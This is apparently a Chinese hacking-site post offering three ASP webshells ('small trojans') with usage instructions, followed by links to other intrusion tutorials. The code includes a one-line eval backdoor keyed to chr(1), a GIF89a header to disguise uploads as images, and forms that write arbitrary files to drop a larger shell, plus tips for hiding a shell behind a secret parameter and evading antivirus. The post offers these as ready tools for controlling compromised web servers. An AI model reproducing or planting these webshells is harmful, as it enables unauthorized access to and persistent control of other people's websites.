第一款：

复制代码 代码如下:

GIF89a$ ;<hTml>

<%eval request(chr(1))%>

<%

on error resume next

testfile=Request.form("filepath")

msg=Request.form("message")

if Trim(request("filepath"))<>"" then

set fs=server.CreateObject("scripting.filesystemobject")

set thisfile=fs.CreateTextFile(testfile,True)

thisfile.Write(""&msg& "")

if err =0 Then

response.write "<font color=red>ok</font>"

else

response.write "<font color=red>no</font>"

end if

err.clear

thisfile.close

set fs = nothing

End if

%>

<form method="POST" ACTION="">

<input type="text" size="20" name="filepath"

value="<%=server.mappath("go.asp")%>"> <BR>

<TEXTAREA NAME="Message" ROWS="5" COLS="40"></TEXTAREA>

<input type="submit" name="Send" value="go">

</form></body></html></body></html>

第二款：

复制代码 代码如下:

GIF89a$ ;<hTml>

<%eval request(chr(1))%>

<% if request("action")="kof97" then %>

<%on error resume next%>

<%ofso="scripting.filesystemobject"%>

<%set fso=server.createobject(ofso)%>

<%path=request("path")%>

<%if path<>"" then%>

<%data=request("dama")%>

<%set dama=fso.createtextfile(path,true)%>

<%dama.write data%>

<%if err=0 then%>

<%="success"%>

<%else%>

<%="false"%>

<%end if%>

<%err.clear%>

<%end if%>

<%dama.close%>

<%set dama=nothing%>

<%set fos=nothing%>

<%="<form action='' method=post>"%>

<%="<input type=text name=path>"%>

<%="<br>"%>

<%=server.mappath(request.servervariables("script_name"))%>

<%="<br>"%>

<%=""%>

<%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>

<%="<br>"%>

<%="<input type=submit value=save>"%>

<%="</form>"%>

<% end if %>

</body></html>

第三款:

复制代码 代码如下:

<%set s=server.createObject("Adodb.Stream")%>

<%s.Type=2%>

<%s.Open%>

<%s.CharSet="gb2312"%>

<%s.writetext request("d")%>

<%s.SaveToFile server.mappath("go.asp"),2%>

<%s.Close%>

<%set s=nothing%>

<form>

<textarea name=d cols=80 rows=10 width=32></textarea>

<input type=submit>

</form>

使用说明及介绍:

第一款 功能说明： 用一句话连接进行传马 或直接传马

GIF89a$ ;<hTml>

--[这里的意思相信大家都了解 意思就是 上传图片时起到欺骗的作用.]

<%eval request(chr(1))%>

--[这是就asp一句话木马 这里的 chr(1) 就是asp一句话木马的密码

那么实际chr(1)= 所以密码为 别说你不知知道

重点来了 当你用这个ASP小马时 你可以用这个asp小马来里面的一句话进行传大马 然也可以直接用这个传大马

这里的go.asp就是上传马的地址了 这个自己可以修改 说的够详细吧

第二款:

同上功能就不说了!

<% if request("action")="kof97" then %>

相信懂ASP的一看就明白! 也不多说了

用法是 直接在你小马地址后面加上 ?action=kof97 给个例子吧

http://www.xxx.com/xxx.asp?action=kof97 kof97这个改成自己的!在小马里面改

好处就是 当别人直接访问你的小马时 显示的是空白 无法使用你的小马 与要密码的小马差不多

第三款:

可以说是除了ASP一句话小马之外就非它莫属了! 只有两百多个字节

<%s.SaveToFile server.mappath("go.asp"),2%>

当你打开小马地址就会自动生成go.asp 修改成自己的

此小马要与 一句话小马 或其它小马 配合使用 当你在在输入框写入我们的马 然后点 提交 会自动生成go.asp 小马地址

好处就是 当别人直接访问你的小马时 不管他提交什么马 他不知道你设置的那个文件地址

【几款双功能免杀超强版asp小马】相关文章：

★ phpMyAdmin 后台拿webshell

★ 价值600元的东亚黑客联盟VIP教程

★ expression&eval跨站的一个方法

★ 巧用端口映射 不通过网关开放任意内网(LCX.exe)

★ 让侮辱中国人的法国cnn网站完蛋

★ XSS 0DAY代码

★ sql server注入建立虚拟目录的方法

★ php+mysql注入页面实现

★ QQ密码被盗怎么办 (教你如何找回QQ密码)

★ PHP 5.2.3 tidy扩展本地溢出漏洞利用代码